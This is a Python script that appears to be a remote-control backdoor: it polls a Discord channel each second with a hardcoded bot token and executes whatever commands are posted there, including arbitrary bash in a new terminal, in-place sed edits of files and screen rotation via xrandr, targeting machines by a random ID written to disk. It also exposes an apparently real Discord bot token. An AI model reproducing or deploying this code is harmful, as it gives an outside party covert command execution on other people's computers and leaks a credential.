import http.client
import json
import time
import random
import subprocess

result = 0
ID = random.randint(0, 1000)

def exiting():
	print("Exiting...")
	exit()

def reverse_screen():
	subprocess.run(['xrandr', '--output', 'eDP', '--rotate', 'inverted'], check=True)

def normal_screen():
	subprocess.run(['xrandr', '--output', 'eDP', '--rotate', 'normal'], check=True)

def right_screen():
	subprocess.run(['xrandr', '--output', 'eDP', '--rotate', 'right'], check=True)

def left_screen():
	subprocess.run(['xrandr', '--output', 'eDP', '--rotate', 'left'], check=True)

def new_terminal(result):
	subprocess.Popen(['gnome-terminal', '--', 'bash', '-c', f'{result}'])

def sed_terminal(result):
	resultsplit = result.split('?')
	subprocess.run(['sed', '-i', f'{resultsplit[0]}', f'{resultsplit[1]}'], check=True)

def launcher_pre(result):
	match result:
		case "exit":
			exiting()
		case "inverted screen":
			reverse_screen()
		case "normal screen":
			normal_screen()
		case "right screen":
			right_screen()
		case "left screen":
			left_screen()
		case _:
			return

def launch_custom(splitresult):
	match splitresult[0]:
		case "newterm":
			new_terminal(splitresult[1])
		case "sed":
			sed_terminal(splitresult[1])
		case _:
			return

def main():
	global result
	global ID
	with open("control-id", "w") as f:
		f.write(str(ID))
		f.close()
	while (True):
		try:
			conn = http.client.HTTPSConnection("discord.com")
			tokenpart2 = "GM3l_P.mrkZgJvU5KWSoz1-onol2XfkW6YbmzlF8H1oT4"
			headers = {'Authorization': f'Bot MTIzMzQ4MTAxMDc4NDUwNTg1Nw.{tokenpart2}'}
			url = f"/api/v10/channels/1341791654503514122/messages?limit=1"
			conn.request("GET", url, headers=headers)
			response = conn.getresponse()
			paste_content = response.read().decode("utf-8")
			json_content = json.loads(paste_content)
			value = json_content[0]['content']
			values = value.split('-')
			if len(values) == 2:
				if values[0] != str(ID):
					time.sleep(1)
					continue
				if result != values[1]:
					result = values[1]
					splitresult = result.split('!')
					if len(splitresult) == 2:
						launch_custom(splitresult)
					else:
						launcher_pre(result)
			elif len(values) == 1:
				if result != values[0]:
					result = values[0]
					splitresult = result.split('^')
					if len(splitresult) == 2:
						launch_custom(splitresult)
					else:
						launcher_pre(result)
			time.sleep(1)
		except Exception as e:
			print(e)
			time.sleep(1)

if __name__ == "__main__":
	main()
